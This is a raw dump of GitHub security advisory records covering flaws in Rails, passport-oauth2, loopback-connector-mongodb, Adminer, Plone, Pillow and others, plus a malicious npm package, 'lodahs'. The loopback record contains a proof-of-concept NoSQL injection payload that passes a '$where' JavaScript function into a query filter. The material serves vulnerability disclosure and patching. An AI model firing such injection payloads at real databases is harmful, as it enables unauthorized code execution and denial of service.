{'https://github.com/advisories/GHSA-xp6v-qx65-4pp7', 'https://rustsec.org/advisories/RUSTSEC-2020-0104.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36211', 'https://github.com/Devolutions/gfwx-rs/issues/7'}
null
GHSA
GHSA-c6qr-h5vq-59jc
Untrusted users can run pending migrations in production in Rails
There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed an untrusted user to run any pending migrations on a Rails app running in production. This vulnerability has been assigned the CVE identifier CVE-2020-8185. Versions Affected: 6.0.0 < rails < 6.0.3.2 Not affected: Applications with `config.action_dispatch.show_exceptions = false` (this is not a default setting in production) Fixed Versions: rails >= 6.0.3.2 Impact ------ Using this issue, an attacker would be able to execute any migrations that are pending for a Rails app running in production mode. It is important to note that an attacker is limited to running migrations the application developer has already defined in their application and ones that have not already ran. Workarounds ----------- Until such time as the patch can be applied, application developers should disable the ActionDispatch middleware in their production environment via a line such as this one in their config/environment/production.rb: `config.middleware.delete ActionDispatch::ActionableExceptions`
{'CVE-2020-8185'}
2021-10-22T14:00:01Z
2020-06-24T17:40:33Z
MODERATE
6.5
{'CWE-400'}
{'https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/', 'https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0', 'https://github.com/advisories/GHSA-c6qr-h5vq-59jc', 'https://hackerone.com/reports/899069', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8185.yml', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8185'}
null
GHSA
GHSA-f794-r6xc-hf3v
Improper Access Control in passport-oauth2
The passport-oauth2 package before 1.6.1 for Node.js mishandles the error condition of failure to obtain an access token. This is exploitable in certain use cases where an OAuth identity provider uses an HTTP 200 status code for authentication-failure error reports, and an application grants authorization upon simply receiving the access token (i.e., does not try to use the token). NOTE: the passport-oauth2 vendor does not consider this a passport-oauth2 vulnerability.
{'CVE-2021-41580'}
2021-10-06T13:23:09Z
2021-09-29T17:18:32Z
MODERATE
5.3
{'CWE-287'}
{'https://github.com/jaredhanson/passport-oauth2/compare/v1.6.0...v1.6.1', 'https://github.com/jaredhanson/passport-oauth2/commit/8e3bcdff145a2219033bd782fc517229fe3e05ea', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41580', 'https://github.com/jaredhanson/passport-oauth2/pull/144', 'https://github.com/advisories/GHSA-f794-r6xc-hf3v', 'https://medium.com/passportjs/no-access-token-no-service-7fb017c9e262'}
null
GHSA
GHSA-m734-r4g6-34f9
NoSQL Injection in loopback-connector-mongodb
Versions of `loopback-connector-mongodb` before 3.6.0 are vulnerable to NoSQL injection. MongoDB Connector for LoopBack fails to properly sanitize a filter passed to query the database by allowing the dangerous `$where` property to be passed to the MongoDB Driver. The Driver allows the special `$where` property in a filter to execute JavaScript (client can pass in a malicious script) on the database Driver. This is an [intended feature of MongoDB](https://docs.mongodb.com/manual/core/server-side-javascript/) unless disabled ([instructions here](https://docs.mongodb.com/manual/core/server-side-javascript/#disable-server-side-js)). A proof of concept malicious query: ``` GET /POST filter={"where": {"$where": "function(){sleep(5000); return this.title.contains('Hello');}"}} ``` The above makes the database sleep for 5 seconds and then returns all “Posts” with the title containing the word `Hello`. ## Recommendation Update to version 3.6.0 or later.
null
2021-08-04T20:48:00Z
2019-06-04T19:36:17Z
HIGH
0
{'CWE-89'}
{'https://github.com/strongloop/loopback-connector-mongodb/issues/403', 'https://github.com/strongloop/loopback-connector-mongodb/pull/452', 'https://github.com/advisories/GHSA-m734-r4g6-34f9', 'https://loopback.io/doc/en/lb3/Security-advisory-08-15-2018.html', 'https://github.com/strongloop/loopback-connector-mongodb/commit/ee24cd08b8ccc32711264831c71b1da628df357b', 'https://www.npmjs.com/advisories/696'}
null
GHSA
GHSA-rrj3-qmh8-72pf
Sensitive Data In Log Files in grunt-gh-pages
Versions of `grunt-gh-pages` prior to 1.0.0 are affected by a vulnerability which may cause unencrypted github credentials to be written to a log file in certain circumstances. In the `grunt-gh-pages` deployment scenario where authentication is performed by injecting a github token directly into the auth portion of the URL, `grunt-gh-pages` will write the token to a log file, unencrypted. ## Recommendation Update to version 1.0.0 or later.
{'CVE-2016-10526'}
2021-01-08T01:57:52Z
2019-02-18T23:39:11Z
MODERATE
0
{'CWE-391'}
{'https://github.com/advisories/GHSA-rrj3-qmh8-72pf', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10526', 'https://www.npmjs.com/advisories/85', 'https://github.com/tschaub/grunt-gh-pages/pull/41', 'https://nodesecurity.io/advisories/85'}
null
GHSA
GHSA-x5r2-hj5c-8jx6
SSRF in adminer
### Impact Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. ### Patches Patched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9). ### Workarounds * Use a single driver version (e.g. `adminer-mysql.php`). * Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/). ### References https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf ### For more information If you have any questions or comments about this advisory: * Comment at ccd2374b.
{'CVE-2021-21311'}
2022-04-19T19:02:47Z
2021-02-11T20:42:59Z
HIGH
7.2
{'CWE-918'}
{'https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html', 'https://packagist.org/packages/vrana/adminer', 'https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6', 'https://sourceforge.net/p/adminer/news/2021/02/adminer-479-released/', 'https://github.com/advisories/GHSA-x5r2-hj5c-8jx6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21311', 'https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf', 'https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351'}
null
GHSA
GHSA-533p-cp2g-99wp
snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)
snipe-it is vulnerable to Cross-Site Request Forgery (CSRF).
{'CVE-2021-3931'}
2021-11-17T21:12:48Z
2021-11-15T23:19:09Z
MODERATE
4.3
{'CWE-352'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-3931', 'https://github.com/advisories/GHSA-533p-cp2g-99wp', 'https://huntr.dev/bounties/03b21d69-3bf5-4b2f-a2cf-872dd677a68f', 'https://github.com/snipe/snipe-it/commit/0d811d067c8e064252c0143c39d6cd4c3133679e'}
null
GHSA
GHSA-rmpv-rcp6-v8wc
Cross-site scripting in Plone
Plone through 5.2.4 allows XSS via a full name that is mishandled during rendering of the ownership tab of a content item.
{'CVE-2021-33508'}
2021-06-08T23:20:11Z
2021-06-08T23:20:11Z
MODERATE
5.4
{'CWE-79'}
{'http://www.openwall.com/lists/oss-security/2021/05/22/1', 'https://github.com/advisories/GHSA-rmpv-rcp6-v8wc', 'https://plone.org/security/hotfix/20210518/stored-xss-from-user-fullname', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33508'}
null
GHSA
GHSA-3c5c-7235-994j
Moderate severity vulnerability that affects Pillow
Buffer overflow in the ImagingPcdDecode function in PcdDecode.c in Pillow before 3.1.1 and Python Imaging Library (PIL) 1.1.7 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PhotoCD file.
{'CVE-2016-2533'}
2021-08-31T20:56:21Z
2018-07-24T20:15:13Z
MODERATE
6.5
{'CWE-119'}
{'http://www.openwall.com/lists/oss-security/2016/02/02/5', 'http://www.debian.org/security/2016/dsa-3499', 'https://github.com/advisories/GHSA-3c5c-7235-994j', 'https://security.gentoo.org/glsa/201612-52', 'http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html', 'http://www.openwall.com/lists/oss-security/2016/02/22/2', 'https://github.com/python-pillow/Pillow/commit/5bdf54b5a76b54fb00bd05f2d733e0a4173eefc9#diff-8ff6909c159597e22288ad818938fd6b', 'https://nvd.nist.gov/vuln/detail/CVE-2016-2533', 'https://github.com/python-pillow/Pillow/pull/1706', 'https://github.com/python-pillow/Pillow/blob/c3cb690fed5d4bf0c45576759de55d054916c165/CHANGES.rst', 'https://github.com/python-pillow/Pillow/commit/ae453aa18b66af54e7ff716f4ccb33adca60afd4#diff-8ff6909c159597e22288ad818938fd6b'}
null
GHSA
GHSA-hm6q-r2jc-cpqh
Malicious Package in lodahs
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
{'CVE-2019-19771'}
2021-07-28T16:49:23Z
2019-12-16T19:29:33Z
HIGH
8.8
{'CWE-20'}
{'https://www.npmjs.com/advisories/1417', 'https://www.npmjs.com/package/lodahs', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19771', 'https://github.com/advisories/GHSA-hm6q-r2jc-cpqh'}
null